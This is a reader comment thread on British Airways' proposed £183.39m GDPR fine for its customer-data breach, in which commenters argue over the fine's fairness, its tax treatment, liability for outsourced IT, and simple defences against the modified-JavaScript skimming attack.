Re: Great solution
Therein lies a problem. If a sufficient number were knowledgeable enough to use blockers there's be a sort of herd immunity in that the site owners would have to make a choice between tightening up or losing custom.
The UK Information Commissioner's Office has warned British Airways it faces a whopping £183.39m fine following the theft of customer records from its website and mobile app servers. The record-breaking fine - more or less the lower end of the price of one of the 747-400s in BA's fleet - under European General Data Protection …
"If a sufficient number..."
Which is highly unlikely to ever happen. Ever asked a non-techie to use NoScript? Hard enough convincing them to use unique passwords and patch their shit which is of far greater benefit. Blocking scripts, while interesting and useful in some cases, is not a workable solution.
no, blocking scripts is not a workable solution for certain scenarios, and I hate to say this, because I use half a dozen (or more) ad blockers, on top of scrip-blocking. But when I buy (not search for!) an airline ticket, or any other product or service online, I go to the old ugly IE. I just don't have time / patience to chase my bank or shop over the phone, when my payment, put through well-defended firefox, comes up with an "oops, something went wrong" page.
We live in a place where we pick what we like to be exposed to and what actions we do that will affect our lives, like what to eat, who to meet, and which javascript to load.
Unlike the common people like you who just blindly put their trust on random strangers and hope you don't get F*cked and Gripped, when in reality real people are getting F*cked and Gripped for the very same mistake.
Bonuses - hell no.
Dividends - likely, though not included in the latest dividend (£700M paid today, by the way...) since nothing has been fined yet. If that £183M needs to be paid in a later day, it will affect the dividend and probably the stock price as well.
Year-over-year the stock has lost almost 40% of its value, which may make some investors tad nervous. This tanking probably has very little to do with this data blurt, but heads may roll in any case.
The data was stolen from BA. BA have been stolen from and now they will be fined for being the victim of theft. Cooperating with the investigation and the attackers seem to be known as a criminal group who do this.
Just reads a little odd. Maybe BA did bad. But I must have missed that bit.
Eh?
If a bank took your valuables, charged you for the privilege of having an account to store these things and then left the safe door open letting evreything be stolen one evening would you be thinking "aw poor bank they didn't mean it to happen, never mind about my precious things you look sad". I don't think so.
As someome else has pointed out if you do everything you should have done and data is still stolen from you then in all likelyhood you will not be fined by the ICO.
BA were incompetent and thoroughly deserve a multimillion £ kick in the nads. I'd also add IMHO they are bloody incompetent as an airline as well.
I understand the replies I am getting, that BA was to be responsible for the data. But the data can always be got to in some way or other and so anyone can be stolen from (physical or digitally) as proven every day.
I have no problem with a fine for BA if they didnt do the expected things to protect the data (and that might be the case here, I just didnt see it) but to be fined because you were stolen from, even if its other peoples property stolen from your possession, seems harsh.
I am not against strong protection of user data. But if we want users then data will be collected and there is always a possibility of compromise. All you can do is best practices.
It's negligence: British Airways failed to protect customers' personal data correctly.
GDPR makes it quite clear that companies that can demonstrate that they have followed the recommendations of the data protection regulators have little to fear. In essence, GDPR limits their exposure to cases brought as a result of their behaviour, as courts can point the settlement and say: dealt with.
By contrast look at some of the settlements across the pond. Boeing has set aside $ 100 million as compensation for the US victims of two plane crashes and Equifax is subject of at least one class action.
However, at the end of the day, the fine sounds worse than it actually is, because it is a charge that can be offset against tax.
By contrast look at some of the settlements across the pond. Boeing has set aside $ 100 million as compensation for the US victims of two plane crashes and Equifax is subject of at least one class action
It seems disproportionate to me. I don't know the details but it was not the case that BA took no security measures and once they knew there was an issue they did respons albeit that the measures and response may have been inadequate and/or tardy. The fine seems orders of magnitude more than reasonable and thsi is reinfirced by the comaprison with Boeing.
Boeings provision is half teh fine against BA. It is quite clear that they designed and manufactured an aircraft which was unsafe. The issue was ,even given allowance for hindsight, of such an obvious nature it should have been identified and there is evidence that the information given to the regulator was misleading and innacurate. Hundreds of people have died as a result of this and yet the provision made is only half the amount that BA have been fined as a result of being victims of a criminal attack for which they were not responsible and in which no one was injured or likely to be injured let alone killed.
There is a massive disconnect between these two numbers.
"The total proposed fine of £183.39 million would be the biggest penalty ever issued by the ICO.
It is the equivalent of 1.5% of BA's global turnover for the financial year ending December 31 2018."
Ref: https://www.standard.co.uk/news/uk/british-airways-fined-more-than-180m-for-customer-data-breach-a4184376.html
Pretty sure fines aren't tax-deductible...
Edit:
https://www.gov.uk/hmrc-internal-manuals/business-income-manual/bim42515
"Regulatory bodies
Where a trader incurs a liability to a regulatory body on revenue account that is broadly intended to cover the regulator’s costs of performing its duties in relation to the trading activities, such costs will normally be allowable even where the trader has committed a breach of regulations. However, should a regulatory body impose a penalty for breach of regulations, or should a penalty or fine become payable as a result of a prosecution for a trader’s breach of regulations, this will not be an allowable expense (see McKnight v Sheppard [1999] 71TC419)."
To get a car analogy in: If you replace your tires because they are worn below the minimum thread depth, the costs of the tires are deductible, regardless of whether you replaced time on time of to (way) late. However, the fine you get for driving with worn tires is not deductible. That seems remarkably in line with common sense...
Thank you for clearing that up, to many people here seem to think companies can just deduct fines where clearly the can't.
The article https://www.theregister.co.uk/2018/09/11/british_airways_website_scripts/ points out how attacks like this work.
In essence a js file hosted on BA's own domain was modified so it posted details to a third party domain. The fact the js file could be modified on their production server is in itself scary, but how can you protect against that?
An easy way is just to monitor the filesystem for changes to any .js file, say every hour. Perhaps diff it against the master copy in their version control. If there are differences email the entire development team as that safeguards against it being an inside job.
A couple of mins work, save several million quid in fines and pissing off a load of (lost) customers. Too simple perhaps?!
but how can you protect against that
One of the standard setting for any webserver is that its user cannot write to any of its files so that it exists in an effectively read-only file-system. This should be standard practice as it was the goto exploit in the days of CGI.
But that itself is not the reason for the size of the fine. There was systematic failure across the line, including on how the data was stored.
The GDPR wording talks about turnover of the Undertaking, which would extend to the whole of IAG, especially if IT systems are managed as a group resource.
this would allow the fine to grow
183m is a baby of a fine, and considering the circumsatnces, size of breach and the Blue Chip status of the BA name, not unreasonable.
So they spent their time and money trying to monetise personal data, rather than trying to secure personal data. And people are moaning that they've now had to pay a fine for all the damage it caused?
Serves them right for seeing personal data as an opportunity rather than a responsibility.
I'd probably sak them off, I'm sure a decent contract will allow that, and possibly recover charges if they are irresponsible. Although if they lost the data would they be the ones getting the fines? The thing I like about GDPR is that it makes companies think about data where they probably have not bothered before.
"... heavily outsourced IT... slips up ... major GDPR breach and fine..."
You are the data handler, therefore you get the fine. It is YOUR responsibility to ensure the outsourcer is secure.
This is not much different than a retailer's obligation on sale of goods, vs recovering costs from the suppliers.
Further litigation between you and the outsourcer over the issue may or may not come under the regulators' purview, depending on how the data was handled and the contracts setup, but you can be assured that if you didn't do your due diligence in the first place you're going to get doubletapped pretty hard by the regulators up front.
Fine not high enough. Besides, no one mentions the fact that BA has outsourced their ops to off shore with the penny pinching mindset so many have, yes it's cheap but it also comes with an army of mostly short skilled people who replaced those they once used to have in house. To their management, it's working well.